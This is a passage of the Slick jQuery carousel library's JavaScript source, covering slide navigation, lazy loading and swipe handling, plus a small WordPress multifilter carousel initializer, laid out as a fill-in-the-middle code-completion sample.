Slick.prototype.initializeEvents = function() { var _ = this; _.initArrowEvents(); _.initDotEvents(); _.initSlideEvents(); _.$list.on('touchstart.slick mousedown.slick', { action: 'start' }, _.swipeHandler); _.$list.on('touchmove.slick mousemove.slick', { action: 'move' }, _.swipeHandler); _.$list.on('touchend.slick mouseup.slick', { action: 'end' }, _.swipeHandler); _.$list.on('touchcancel.slick mouseleave.slick', { action: 'end' }, _.swipeHandler); _.$list.on('click.slick', _.clickHandler); $(document).on(_.visibilityChange, $.proxy(_.visibility, _)); if (_.options.accessibility === true) { _.$list.on('keydown.slick', _.keyHandler); } if (_.options.focusOnSelect === true) { $(_.$slideTrack).children().on('click.slick', _.selectHandler); } $(window).on('orientationchange.slick.slick-' + _.instanceUid, $.proxy(_.orientationChange, _)); $(window).on('resize.slick.slick-' + _.instanceUid, $.proxy(_.resize, _)); $('[draggable!=true]', _.$slideTrack).on('dragstart', _.preventDefault); $(window).on('load.slick.slick-' + _.instanceUid, _.setPosition); $(_.setPosition); }; Slick.prototype.initUI = function() { var _ = this; if (_.options.arrows === true && _.slideCount > _.options.slidesToShow) { _.$prevArrow.show(); _.$nextArrow.show(); } if (_.options.dots === true && _.slideCount > _.options.slidesToShow) { _.$dots.show(); } }; Slick.prototype.keyHandler = function(event) { var _ = this; //Dont slide if the cursor is inside the form fields and arrow keys are pressed if(!event.target.tagName.match('TEXTAREA|INPUT|SELECT')) { if (event.keyCode === 37 && _.options.accessibility === true) { _.changeSlide({ data: { message: _.options.rtl === true ? 'next' : 'previous' } }); } else if (event.keyCode === 39 && _.options.accessibility === true) { _.changeSlide({ data: { message: _.options.rtl === true ? 'previous' : 'next' } }); } } }; Slick.prototype.lazyLoad = function() { var _ = this, loadRange, cloneRange, rangeStart, rangeEnd; function loadImages(imagesScope) { $('img[data-lazy]', imagesScope).each(function() { var image = $(this), imageSource = $(this).attr('data-lazy'), imageSrcSet = $(this).attr('data-srcset'), imageSizes = $(this).attr('data-sizes') || _.$slider.attr('data-sizes'), imageToLoad = document.createElement('img'); imageToLoad.onload = function() { image .animate({ opacity: 0 }, 100, function() { if (imageSrcSet) { image .attr('srcset', imageSrcSet ); if (imageSizes) { image .attr('sizes', imageSizes ); } } image .attr('src', imageSource) .animate({ opacity: 1 }, 200, function() { image .removeAttr('data-lazy data-srcset data-sizes') .removeClass('slick-loading'); }); _.$slider.trigger('lazyLoaded', [_, image, imageSource]); }); }; imageToLoad.onerror = function() { image .removeAttr( 'data-lazy' ) .removeClass( 'slick-loading' ) .addClass( 'slick-lazyload-error' ); _.$slider.trigger('lazyLoadError', [ _, image, imageSource ]); }; imageToLoad.src = imageSource; }); } if (_.options.centerMode === true) { if (_.options.infinite === true) { rangeStart = _.currentSlide + (_.options.slidesToShow / 2 + 1); rangeEnd = rangeStart + _.options.slidesToShow + 2; } else { rangeStart = Math.max(0, _.currentSlide - (_.options.slidesToShow / 2 + 1)); rangeEnd = 2 + (_.options.slidesToShow / 2 + 1) + _.currentSlide; } } else { rangeStart = _.options.infinite ? _.options.slidesToShow + _.currentSlide : _.currentSlide; rangeEnd = Math.ceil(rangeStart + _.options.slidesToShow); if (_.options.fade === true) { if (rangeStart > 0) rangeStart--; if (rangeEnd <= _.slideCount) rangeEnd++; } } loadRange = _.$slider.find('.slick-slide').slice(rangeStart, rangeEnd); if (_.options.lazyLoad === 'anticipated') { var prevSlide = rangeStart - 1, nextSlide = rangeEnd, $slides = _.$slider.find('.slick-slide'); for (var i = 0; i < _.options.slidesToScroll; i++) { if (prevSlide < 0) prevSlide = _.slideCount - 1; loadRange = loadRange.add($slides.eq(prevSlide)); loadRange = loadRange.add($slides.eq(nextSlide)); prevSlide--; nextSlide++; } } loadImages(loadRange); if (_.slideCount <= _.options.slidesToShow) { cloneRange = _.$slider.find('.slick-slide'); loadImages(cloneRange); } else if (_.currentSlide >= _.slideCount - _.options.slidesToShow) { cloneRange = _.$slider.find('.slick-cloned').slice(0, _.options.slidesToShow); loadImages(cloneRange); } else if (_.currentSlide === 0) { cloneRange = _.$slider.find('.slick-cloned').slice(_.options.slidesToShow * -1); loadImages(cloneRange); } }; Slick.prototype.loadSlider = function() { var _ = this; _.setPosition(); _.$slideTrack.css({ opacity: 1 }); _.$slider.removeClass('slick-loading'); _.initUI(); if (_.options.lazyLoad === 'progressive') { _.progressiveLazyLoad(); } }; Slick.prototype.next = Slick.prototype.slickNext = function() { var _ = this; _.changeSlide({ data: { message: 'next' } }); }; Slick.prototype.orientationChange = function() { var _ = this; _.checkResponsive(); _.setPosition(); }; Slick.prototype.pause = Slick.prototype.slickPause = function() { var _ = this; _.autoPlayClear(); _.paused = true; }; Slick.prototype.play = Slick.prototype.slickPlay = function() { var _ = this; _.autoPlay(); _.options.autoplay = true; _.paused = false; _.focussed = false; _.interrupted = false; }; Slick.prototype.postSlide = function(index) { var _ = this; if( !_.unslicked ) { _.$slider.trigger('afterChange', [_, index]); _.animating = false; if (_.slideCount > _.options.slidesToShow) { _.setPosition(); } _.swipeLeft = null; if ( _.options.autoplay ) { _.autoPlay(); } if (_.options.accessibility === true) { _.initADA(); if (_.options.focusOnChange) { var $currentSlide = $(_.$slides.get(_.currentSlide)); $currentSlide.attr('tabindex', 0).focus(); } } } }; Slick.prototype.prev = Slick.prototype.slickPrev = function() { var _ = this; _.changeSlide({ data: { message: 'previous' } }); }; Slick.prototype.preventDefault = function(event) { event.preventDefault(); }; Slick.prototype.progressiveLazyLoad = function( tryCount ) { tryCount = tryCount || 1; var _ = this, $imgsToLoad = $( 'img[data-lazy]', _.$slider ), image, imageSource, imageSrcSet, imageSizes, imageToLoad; if ( $imgsToLoad.length ) { image = $imgsToLoad.first(); imageSource = image.attr('data-lazy'); imageSrcSet = image.attr('data-srcset'); imageSizes = image.attr('data-sizes') || _.$slider.attr('data-sizes'); imageToLoad = document.createElement('img'); imageToLoad.onload = function() { if (imageSrcSet) { image .attr('srcset', imageSrcSet ); if (imageSizes) { image .attr('sizes', imageSizes ); } } image .attr( 'src', imageSource ) .removeAttr('data-lazy data-srcset data-sizes') .removeClass('slick-loading'); if ( _.options.adaptiveHeight === true ) { _.setPosition(); } _.$slider.trigger('lazyLoaded', [ _, image, imageSource ]); _.progressiveLazyLoad(); }; imageToLoad.onerror = function() { if ( tryCount < 3 ) { /** * try to load the image 3 times, * leave a slight delay so we don't get * servers blocking the request. */ setTimeout( function() { _.progressiveLazyLoad( tryCount + 1 ); }, 500 ); } else { image .removeAttr( 'data-lazy' ) .removeClass( 'slick-loading' ) .addClass( 'slick-lazyload-error' ); _.$slider.trigger('lazyLoadError', [ _, image, imageSource ]); _.progressiveLazyLoad(); } }; imageToLoad.src = imageSource; } else { _.$slider.trigger('allImagesLoaded', [ _ ]); } }; Slick.prototype.refresh = function( initializing ) { var _ = this, currentSlide, lastVisibleIndex; lastVisibleIndex = _.slideCount - _.options.slidesToShow; // in non-infinite sliders, we don't want to go past the // last visible index. if( !_.options.infinite && ( _.currentSlide > lastVisibleIndex )) { _.currentSlide = lastVisibleIndex; } // if less slides than to show, go to start. if ( _.slideCount <= _.options.slidesToShow ) { _.currentSlide = 0; } currentSlide = _.currentSlide; _.destroy(true); $.extend(_, _.initials, { currentSlide: currentSlide }); _.init(); if( !initializing ) { _.changeSlide({ data: { message: 'index', index: currentSlide } }, false); } }; Slick.prototype.registerBreakpoints = function() { var _ = this, breakpoint, currentBreakpoint, l, responsiveSettings = _.options.responsive || null; if ( $.type(responsiveSettings) === 'array' && responsiveSettings.length ) { _.respondTo = _.options.respondTo || 'window'; for ( breakpoint in responsiveSettings ) { l = _.breakpoints.length-1; if (responsiveSettings.hasOwnProperty(breakpoint)) { currentBreakpoint = responsiveSettings[breakpoint].breakpoint; // loop through the breakpoints and cut out any existing // ones with the same breakpoint number, we don't want dupes. while( l >= 0 ) { if( _.breakpoints[l] && _.breakpoints[l] === currentBreakpoint ) { _.breakpoints.splice(l,1); } l--; } _.breakpoints.push(currentBreakpoint); _.breakpointSettings[currentBreakpoint] = responsiveSettings[breakpoint].settings; } } _.breakpoints.sort(function(a, b) { return ( _.options.mobileFirst ) ? a-b : b-a; }); } }; Slick.prototype.reinit = function() { var _ = this; _.$slides = _.$slideTrack .children(_.options.slide) .addClass('slick-slide'); _.slideCount = _.$slides.length; if (_.currentSlide >= _.slideCount && _.currentSlide !== 0) { _.currentSlide = _.currentSlide - _.options.slidesToScroll; } if (_.slideCount <= _.options.slidesToShow) { _.currentSlide = 0; } _.registerBreakpoints(); _.setProps(); _.setupInfinite(); _.buildArrows(); _.updateArrows(); _.initArrowEvents(); _.buildDots(); _.updateDots(); _.initDotEvents(); _.cleanUpSlideEvents(); _.initSlideEvents(); _.checkResponsive(false, true); if (_.options.focusOnSelect === true) { $(_.$slideTrack).children().on('click.slick', _.selectHandler); } _.setSlideClasses(typeof _.currentSlide === 'number' ? _.currentSlide : 0); _.setPosition(); _.focusHandler(); _.paused = !_.options.autoplay; _.autoPlay(); _.$slider.trigger('reInit', [_]); }; Slick.prototype.resize = function() { var _ = this; if ($(window).width() !== _.windowWidth) { clearTimeout(_.windowDelay); _.windowDelay = window.setTimeout(function() { _.windowWidth = $(window).width(); _.checkResponsive(); if( !_.unslicked ) { _.setPosition(); } }, 50); } }; Slick.prototype.removeSlide = Slick.prototype.slickRemove = function(index, removeBefore, removeAll) { var _ = this; if (typeof(index) === 'boolean') { removeBefore = index; index = removeBefore === true ? 0 : _.slideCount - 1; } else { index = removeBefore === true ? --index : index; } if (_.slideCount < 1 || index < 0 || index > _.slideCount - 1) { return false; } _.unload(); if (removeAll === true) { _.$slideTrack.children().remove(); } else { _.$slideTrack.children(this.options.slide).eq(index).remove(); } _.$slides = _.$slideTrack.children(this.options.slide); _.$slideTrack.children(this.options.slide).detach(); _.$slideTrack.append(_.$slides); _.$slidesCache = _.$slides; _.reinit(); }; Slick.prototype.setCSS = function(position) { var _ = this, positionProps = {}, x, y; if (_.options.rtl === true) { position = -position; } x = _.positionProp == 'left' ? Math.ceil(position) + 'px' : '0px'; y = _.positionProp == 'top' ? Math.ceil(position) + 'px' : '0px'; positionProps[_.positionProp] = position; if (_.transformsEnabled === false) { _.$slideTrack.css(positionProps); } else { positionProps = {}; if (_.cssTransitions === false) { positionProps[_.animType] = 'translate(' + x + ', ' + y + ')'; _.$slideTrack.css(positionProps); } else { positionProps[_.animType] = 'translate3d(' + x + ', ' + y + ', 0px)'; _.$slideTrack.css(positionProps); } } }; Slick.prototype.setDimensions = function() { var _ = this; if (_.options.vertical === false) { if (_.options.centerMode === true) { _.$list.css({ padding: ('0px ' + _.options.centerPadding) }); } } else { _.$list.height(_.$slides.first().outerHeight(true) * _.options.slidesToShow); if (_.options.centerMode === true) { _.$list.css({ padding: (_.options.centerPadding + ' 0px') }); } } _.listWidth = _.$list.width(); _.listHeight = _.$list.height(); if (_.options.vertical === false && _.options.variableWidth === false) { _.slideWidth = Math.ceil(_.listWidth / _.options.slidesToShow); _.$slideTrack.width(Math.ceil((_.slideWidth * _.$slideTrack.children('.slick-slide').length))); } else if (_.options.variableWidth === true) { _.$slideTrack.width(5000 * _.slideCount); } else { _.slideWidth = Math.ceil(_.listWidth); _.$slideTrack.height(Math.ceil((_.$slides.first().outerHeight(true) * _.$slideTrack.children('.slick-slide').length))); } var offset = _.$slides.first().outerWidth(true) - _.$slides.first().width(); if (_.options.variableWidth === false) _.$slideTrack.children('.slick-slide').width(_.slideWidth - offset); }; Slick.prototype.setFade = function() { var _ = this, targetLeft; _.$slides.each(function(index, element) { targetLeft = (_.slideWidth * index) * -1; if (_.options.rtl === true) { $(element).css({ position: 'relative', right: targetLeft, top: 0, zIndex: _.options.zIndex - 2, opacity: 0 }); } else { $(element).css({ position: 'relative', left: targetLeft, top: 0, zIndex: _.options.zIndex - 2, opacity: 0 }); } }); _.$slides.eq(_.currentSlide).css({ zIndex: _.options.zIndex - 1, opacity: 1 }); }; Slick.prototype.setHeight = function() { var _ = this; if (_.options.slidesToShow === 1 && _.options.adaptiveHeight === true && _.options.vertical === false) { var targetHeight = _.$slides.eq(_.currentSlide).outerHeight(true); _.$list.css('height', targetHeight); } }; Slick.prototype.setOption = Slick.prototype.slickSetOption = function() { /** * accepts arguments in format of: * * - for changing a single option's value: * .slick("setOption", option, value, refresh ) * * - for changing a set of responsive options: * .slick("setOption", 'responsive', [{}, ...], refresh ) * * - for updating multiple values at once (not responsive) * .slick("setOption", { 'option': value, ... }, refresh ) */ var _ = this, l, item, option, value, refresh = false, type; if( $.type( arguments[0] ) === 'object' ) { option = arguments[0]; refresh = arguments[1]; type = 'multiple'; } else if ( $.type( arguments[0] ) === 'string' ) { option = arguments[0]; value = arguments[1]; refresh = arguments[2]; if ( arguments[0] === 'responsive' && $.type( arguments[1] ) === 'array' ) { type = 'responsive'; } else if ( typeof arguments[1] !== 'undefined' ) { type = 'single'; } } if ( type === 'single' ) { _.options[option] = value; } else if ( type === 'multiple' ) { $.each( option , function( opt, val ) { _.options[opt] = val; }); } else if ( type === 'responsive' ) { for ( item in value ) { if( $.type( _.options.responsive ) !== 'array' ) { _.options.responsive = [ value[item] ]; } else { l = _.options.responsive.length-1; // loop through the responsive object and splice out duplicates. while( l >= 0 ) { if( _.options.responsive[l].breakpoint === value[item].breakpoint ) { _.options.responsive.splice(l,1); } l--; } _.options.responsive.push( value[item] ); } } } if ( refresh ) { _.unload(); _.reinit(); } }; Slick.prototype.setPosition = function() { var _ = this; _.setDimensions(); _.setHeight(); if (_.options.fade === false) { _.setCSS(_.getLeft(_.currentSlide)); } else { _.setFade(); } _.$slider.trigger('setPosition', [_]); }; Slick.prototype.setProps = function() { var _ = this, bodyStyle = document.body.style; _.positionProp = _.options.vertical === true ? 'top' : 'left'; if (_.positionProp === 'top') { _.$slider.addClass('slick-vertical'); } else { _.$slider.removeClass('slick-vertical'); } if (bodyStyle.WebkitTransition !== undefined || bodyStyle.MozTransition !== undefined || bodyStyle.msTransition !== undefined) { if (_.options.useCSS === true) { _.cssTransitions = true; } } if ( _.options.fade ) { if ( typeof _.options.zIndex === 'number' ) { if( _.options.zIndex < 3 ) { _.options.zIndex = 3; } } else { _.options.zIndex = _.defaults.zIndex; } } if (bodyStyle.OTransform !== undefined) { _.animType = 'OTransform'; _.transformType = '-o-transform'; _.transitionType = 'OTransition'; if (bodyStyle.perspectiveProperty === undefined && bodyStyle.webkitPerspective === undefined) _.animType = false; } if (bodyStyle.MozTransform !== undefined) { _.animType = 'MozTransform'; _.transformType = '-moz-transform'; _.transitionType = 'MozTransition'; if (bodyStyle.perspectiveProperty === undefined && bodyStyle.MozPerspective === undefined) _.animType = false; } if (bodyStyle.webkitTransform !== undefined) { _.animType = 'webkitTransform'; _.transformType = '-webkit-transform'; _.transitionType = 'webkitTransition'; if (bodyStyle.perspectiveProperty === undefined && bodyStyle.webkitPerspective === undefined) _.animType = false; } if (bodyStyle.msTransform !== undefined) { _.animType = 'msTransform'; _.transformType = '-ms-transform'; _.transitionType = 'msTransition'; if (bodyStyle.msTransform === undefined) _.animType = false; } if (bodyStyle.transform !== undefined && _.animType !== false) { _.animType = 'transform'; _.transformType = 'transform'; _.transitionType = 'transition'; } _.transformsEnabled = _.options.useTransform && (_.animType !== null && _.animType !== false); }; Slick.prototype.setSlideClasses = function(index) { var _ = this, centerOffset, allSlides, indexOffset, remainder; allSlides = _.$slider .find('.slick-slide') .removeClass('slick-active slick-center slick-current') .attr('aria-hidden', 'true'); _.$slides .eq(index) .addClass('slick-current'); if (_.options.centerMode === true) { var evenCoef = _.options.slidesToShow % 2 === 0 ? 1 : 0; centerOffset = Math.floor(_.options.slidesToShow / 2); if (_.options.infinite === true) { if (index >= centerOffset && index <= (_.slideCount - 1) - centerOffset) { _.$slides .slice(index - centerOffset + evenCoef, index + centerOffset + 1) .addClass('slick-active') .attr('aria-hidden', 'false'); } else { indexOffset = _.options.slidesToShow + index; allSlides .slice(indexOffset - centerOffset + 1 + evenCoef, indexOffset + centerOffset + 2) .addClass('slick-active') .attr('aria-hidden', 'false'); } if (index === 0) { allSlides .eq(allSlides.length - 1 - _.options.slidesToShow) .addClass('slick-center'); } else if (index === _.slideCount - 1) { allSlides .eq(_.options.slidesToShow) .addClass('slick-center'); } } _.$slides<|fim▁hole|> if (index >= 0 && index <= (_.slideCount - _.options.slidesToShow)) { _.$slides .slice(index, index + _.options.slidesToShow) .addClass('slick-active') .attr('aria-hidden', 'false'); } else if (allSlides.length <= _.options.slidesToShow) { allSlides .addClass('slick-active') .attr('aria-hidden', 'false'); } else { remainder = _.slideCount % _.options.slidesToShow; indexOffset = _.options.infinite === true ? _.options.slidesToShow + index : index; if (_.options.slidesToShow == _.options.slidesToScroll && (_.slideCount - index) < _.options.slidesToShow) { allSlides .slice(indexOffset - (_.options.slidesToShow - remainder), indexOffset + remainder) .addClass('slick-active') .attr('aria-hidden', 'false'); } else { allSlides .slice(indexOffset, indexOffset + _.options.slidesToShow) .addClass('slick-active') .attr('aria-hidden', 'false'); } } } if (_.options.lazyLoad === 'ondemand' || _.options.lazyLoad === 'anticipated') { _.lazyLoad(); } }; Slick.prototype.setupInfinite = function() { var _ = this, i, slideIndex, infiniteCount; if (_.options.fade === true) { _.options.centerMode = false; } if (_.options.infinite === true && _.options.fade === false) { slideIndex = null; if (_.slideCount > _.options.slidesToShow) { if (_.options.centerMode === true) { infiniteCount = _.options.slidesToShow + 1; } else { infiniteCount = _.options.slidesToShow; } for (i = _.slideCount; i > (_.slideCount - infiniteCount); i -= 1) { slideIndex = i - 1; $(_.$slides[slideIndex]).clone(true).attr('id', '') .attr('data-slick-index', slideIndex - _.slideCount) .prependTo(_.$slideTrack).addClass('slick-cloned'); } for (i = 0; i < infiniteCount + _.slideCount; i += 1) { slideIndex = i; $(_.$slides[slideIndex]).clone(true).attr('id', '') .attr('data-slick-index', slideIndex + _.slideCount) .appendTo(_.$slideTrack).addClass('slick-cloned'); } _.$slideTrack.find('.slick-cloned').find('[id]').each(function() { $(this).attr('id', ''); }); } } }; Slick.prototype.interrupt = function( toggle ) { var _ = this; if( !toggle ) { _.autoPlay(); } _.interrupted = toggle; }; Slick.prototype.selectHandler = function(event) { var _ = this; var targetElement = $(event.target).is('.slick-slide') ? $(event.target) : $(event.target).parents('.slick-slide'); var index = parseInt(targetElement.attr('data-slick-index')); if (!index) index = 0; if (_.slideCount <= _.options.slidesToShow) { _.slideHandler(index, false, true); return; } _.slideHandler(index); }; Slick.prototype.slideHandler = function(index, sync, dontAnimate) { var targetSlide, animSlide, oldSlide, slideLeft, targetLeft = null, _ = this, navTarget; sync = sync || false; if (_.animating === true && _.options.waitForAnimate === true) { return; } if (_.options.fade === true && _.currentSlide === index) { return; } if (sync === false) { _.asNavFor(index); } targetSlide = index; targetLeft = _.getLeft(targetSlide); slideLeft = _.getLeft(_.currentSlide); _.currentLeft = _.swipeLeft === null ? slideLeft : _.swipeLeft; if (_.options.infinite === false && _.options.centerMode === false && (index < 0 || index > _.getDotCount() * _.options.slidesToScroll)) { if (_.options.fade === false) { targetSlide = _.currentSlide; if (dontAnimate !== true && _.slideCount > _.options.slidesToShow) { _.animateSlide(slideLeft, function() { _.postSlide(targetSlide); }); } else { _.postSlide(targetSlide); } } return; } else if (_.options.infinite === false && _.options.centerMode === true && (index < 0 || index > (_.slideCount - _.options.slidesToScroll))) { if (_.options.fade === false) { targetSlide = _.currentSlide; if (dontAnimate !== true && _.slideCount > _.options.slidesToShow) { _.animateSlide(slideLeft, function() { _.postSlide(targetSlide); }); } else { _.postSlide(targetSlide); } } return; } if ( _.options.autoplay ) { clearInterval(_.autoPlayTimer); } if (targetSlide < 0) { if (_.slideCount % _.options.slidesToScroll !== 0) { animSlide = _.slideCount - (_.slideCount % _.options.slidesToScroll); } else { animSlide = _.slideCount + targetSlide; } } else if (targetSlide >= _.slideCount) { if (_.slideCount % _.options.slidesToScroll !== 0) { animSlide = 0; } else { animSlide = targetSlide - _.slideCount; } } else { animSlide = targetSlide; } _.animating = true; _.$slider.trigger('beforeChange', [_, _.currentSlide, animSlide]); oldSlide = _.currentSlide; _.currentSlide = animSlide; _.setSlideClasses(_.currentSlide); if ( _.options.asNavFor ) { navTarget = _.getNavTarget(); navTarget = navTarget.slick('getSlick'); if ( navTarget.slideCount <= navTarget.options.slidesToShow ) { navTarget.setSlideClasses(_.currentSlide); } } _.updateDots(); _.updateArrows(); if (_.options.fade === true) { if (dontAnimate !== true) { _.fadeSlideOut(oldSlide); _.fadeSlide(animSlide, function() { _.postSlide(animSlide); }); } else { _.postSlide(animSlide); } _.animateHeight(); return; } if (dontAnimate !== true && _.slideCount > _.options.slidesToShow) { _.animateSlide(targetLeft, function() { _.postSlide(animSlide); }); } else { _.postSlide(animSlide); } }; Slick.prototype.startLoad = function() { var _ = this; if (_.options.arrows === true && _.slideCount > _.options.slidesToShow) { _.$prevArrow.hide(); _.$nextArrow.hide(); } if (_.options.dots === true && _.slideCount > _.options.slidesToShow) { _.$dots.hide(); } _.$slider.addClass('slick-loading'); }; Slick.prototype.swipeDirection = function() { var xDist, yDist, r, swipeAngle, _ = this; xDist = _.touchObject.startX - _.touchObject.curX; yDist = _.touchObject.startY - _.touchObject.curY; r = Math.atan2(yDist, xDist); swipeAngle = Math.round(r * 180 / Math.PI); if (swipeAngle < 0) { swipeAngle = 360 - Math.abs(swipeAngle); } if ((swipeAngle <= 45) && (swipeAngle >= 0)) { return (_.options.rtl === false ? 'left' : 'right'); } if ((swipeAngle <= 360) && (swipeAngle >= 315)) { return (_.options.rtl === false ? 'left' : 'right'); } if ((swipeAngle >= 135) && (swipeAngle <= 225)) { return (_.options.rtl === false ? 'right' : 'left'); } if (_.options.verticalSwiping === true) { if ((swipeAngle >= 35) && (swipeAngle <= 135)) { return 'down'; } else { return 'up'; } } return 'vertical'; }; Slick.prototype.swipeEnd = function(event) { var _ = this, slideCount, direction; _.dragging = false; _.swiping = false; if (_.scrolling) { _.scrolling = false; return false; } _.interrupted = false; _.shouldClick = ( _.touchObject.swipeLength > 10 ) ? false : true; if ( _.touchObject.curX === undefined ) { return false; } if ( _.touchObject.edgeHit === true ) { _.$slider.trigger('edge', [_, _.swipeDirection() ]); } if ( _.touchObject.swipeLength >= _.touchObject.minSwipe ) { direction = _.swipeDirection(); switch ( direction ) { case 'left': case 'down': slideCount = _.options.swipeToSlide ? _.checkNavigable( _.currentSlide + _.getSlideCount() ) : _.currentSlide + _.getSlideCount(); _.currentDirection = 0; break; case 'right': case 'up': slideCount = _.options.swipeToSlide ? _.checkNavigable( _.currentSlide - _.getSlideCount() ) : _.currentSlide - _.getSlideCount(); _.currentDirection = 1; break; default: } if( direction != 'vertical' ) { _.slideHandler( slideCount ); _.touchObject = {}; _.$slider.trigger('swipe', [_, direction ]); } } else { if ( _.touchObject.startX !== _.touchObject.curX ) { _.slideHandler( _.currentSlide ); _.touchObject = {}; } } }; Slick.prototype.swipeHandler = function(event) { var _ = this; if ((_.options.swipe === false) || ('ontouchend' in document && _.options.swipe === false)) { return; } else if (_.options.draggable === false && event.type.indexOf('mouse') !== -1) { return; } _.touchObject.fingerCount = event.originalEvent && event.originalEvent.touches !== undefined ? event.originalEvent.touches.length : 1; _.touchObject.minSwipe = _.listWidth / _.options .touchThreshold; if (_.options.verticalSwiping === true) { _.touchObject.minSwipe = _.listHeight / _.options .touchThreshold; } switch (event.data.action) { case 'start': _.swipeStart(event); break; case 'move': _.swipeMove(event); break; case 'end': _.swipeEnd(event); break; } }; Slick.prototype.swipeMove = function(event) { var _ = this, edgeWasHit = false, curLeft, swipeDirection, swipeLength, positionOffset, touches, verticalSwipeLength; touches = event.originalEvent !== undefined ? event.originalEvent.touches : null; if (!_.dragging || _.scrolling || touches && touches.length !== 1) { return false; } curLeft = _.getLeft(_.currentSlide); _.touchObject.curX = touches !== undefined ? touches[0].pageX : event.clientX; _.touchObject.curY = touches !== undefined ? touches[0].pageY : event.clientY; _.touchObject.swipeLength = Math.round(Math.sqrt( Math.pow(_.touchObject.curX - _.touchObject.startX, 2))); verticalSwipeLength = Math.round(Math.sqrt( Math.pow(_.touchObject.curY - _.touchObject.startY, 2))); if (!_.options.verticalSwiping && !_.swiping && verticalSwipeLength > 4) { _.scrolling = true; return false; } if (_.options.verticalSwiping === true) { _.touchObject.swipeLength = verticalSwipeLength; } swipeDirection = _.swipeDirection(); if (event.originalEvent !== undefined && _.touchObject.swipeLength > 4) { _.swiping = true; event.preventDefault(); } positionOffset = (_.options.rtl === false ? 1 : -1) * (_.touchObject.curX > _.touchObject.startX ? 1 : -1); if (_.options.verticalSwiping === true) { positionOffset = _.touchObject.curY > _.touchObject.startY ? 1 : -1; } swipeLength = _.touchObject.swipeLength; _.touchObject.edgeHit = false; if (_.options.infinite === false) { if ((_.currentSlide === 0 && swipeDirection === 'right') || (_.currentSlide >= _.getDotCount() && swipeDirection === 'left')) { swipeLength = _.touchObject.swipeLength * _.options.edgeFriction; _.touchObject.edgeHit = true; } } if (_.options.vertical === false) { _.swipeLeft = curLeft + swipeLength * positionOffset; } else { _.swipeLeft = curLeft + (swipeLength * (_.$list.height() / _.listWidth)) * positionOffset; } if (_.options.verticalSwiping === true) { _.swipeLeft = curLeft + swipeLength * positionOffset; } if (_.options.fade === true || _.options.touchMove === false) { return false; } if (_.animating === true) { _.swipeLeft = null; return false; } _.setCSS(_.swipeLeft); }; Slick.prototype.swipeStart = function(event) { var _ = this, touches; _.interrupted = true; if (_.touchObject.fingerCount !== 1 || _.slideCount <= _.options.slidesToShow) { _.touchObject = {}; return false; } if (event.originalEvent !== undefined && event.originalEvent.touches !== undefined) { touches = event.originalEvent.touches[0]; } _.touchObject.startX = _.touchObject.curX = touches !== undefined ? touches.pageX : event.clientX; _.touchObject.startY = _.touchObject.curY = touches !== undefined ? touches.pageY : event.clientY; _.dragging = true; }; Slick.prototype.unfilterSlides = Slick.prototype.slickUnfilter = function() { var _ = this; if (_.$slidesCache !== null) { _.unload(); _.$slideTrack.children(this.options.slide).detach(); _.$slidesCache.appendTo(_.$slideTrack); _.reinit(); } }; Slick.prototype.unload = function() { var _ = this; $('.slick-cloned', _.$slider).remove(); if (_.$dots) { _.$dots.remove(); } if (_.$prevArrow && _.htmlExpr.test(_.options.prevArrow)) { _.$prevArrow.remove(); } if (_.$nextArrow && _.htmlExpr.test(_.options.nextArrow)) { _.$nextArrow.remove(); } _.$slides .removeClass('slick-slide slick-active slick-visible slick-current') .attr('aria-hidden', 'true') .css('width', ''); }; Slick.prototype.unslick = function(fromBreakpoint) { var _ = this; _.$slider.trigger('unslick', [_, fromBreakpoint]); _.destroy(); }; Slick.prototype.updateArrows = function() { var _ = this, centerOffset; centerOffset = Math.floor(_.options.slidesToShow / 2); if ( _.options.arrows === true && _.slideCount > _.options.slidesToShow && !_.options.infinite ) { _.$prevArrow.removeClass('slick-disabled').attr('aria-disabled', 'false'); _.$nextArrow.removeClass('slick-disabled').attr('aria-disabled', 'false'); if (_.currentSlide === 0) { _.$prevArrow.addClass('slick-disabled').attr('aria-disabled', 'true'); _.$nextArrow.removeClass('slick-disabled').attr('aria-disabled', 'false'); } else if (_.currentSlide >= _.slideCount - _.options.slidesToShow && _.options.centerMode === false) { _.$nextArrow.addClass('slick-disabled').attr('aria-disabled', 'true'); _.$prevArrow.removeClass('slick-disabled').attr('aria-disabled', 'false'); } else if (_.currentSlide >= _.slideCount - 1 && _.options.centerMode === true) { _.$nextArrow.addClass('slick-disabled').attr('aria-disabled', 'true'); _.$prevArrow.removeClass('slick-disabled').attr('aria-disabled', 'false'); } } }; Slick.prototype.updateDots = function() { var _ = this; if (_.$dots !== null) { _.$dots .find('li') .removeClass('slick-active') .end(); _.$dots .find('li') .eq(Math.floor(_.currentSlide / _.options.slidesToScroll)) .addClass('slick-active'); } }; Slick.prototype.visibility = function() { var _ = this; if ( _.options.autoplay ) { if ( document[_.hidden] ) { _.interrupted = true; } else { _.interrupted = false; } } }; $.fn.slick = function() { var _ = this, opt = arguments[0], args = Array.prototype.slice.call(arguments, 1), l = _.length, i, ret; for (i = 0; i < l; i++) { if (typeof opt == 'object' || typeof opt == 'undefined') _[i].slick = new Slick(_[i], opt); else ret = _[i].slick[opt].apply(_[i].slick, args); if (typeof ret != 'undefined') return ret; } return _; }; $( document ).ready(function() { $( '.exopite-multifilter-items.slick-carousel' ).each(function ( idx, item ) { var carouselId = "slick-carousel" + idx; var data = $( this ).parent( '.exopite-multifilter-container' ).data( 'carousel' ); if ( typeof data !== "undefined" ) { this.id = carouselId; $( this ).slick({ autoplay: ( data.autoplay === 'false' ) ? false : true, arrows: ( data.arrows === 'false' ) ? false : true, autoplaySpeed: data.autoplay_speed, infinite: ( data.infinite === 'false' ) ? false : true, speed: parseInt( data.speed ), pauseOnHover: ( data.pause_on_hover === 'false' ) ? false : true, dots: ( data.dots === 'false' ) ? false : true, adaptiveHeight: ( data.adaptive_height === 'false' ) ? false : true, mobileFirst: ( data.mobile_first === 'false' ) ? false : true, slidesPerRow: parseInt( data.slides_per_row ), slidesToShow: parseInt( data.slides_to_show ), slidesToScroll: parseInt( data.slides_to_scroll ), useTransform: ( data.use_transform === 'false' ) ? false : true, }); } }); }); }));<|fim▁end|>
.eq(index) .addClass('slick-center'); } else {
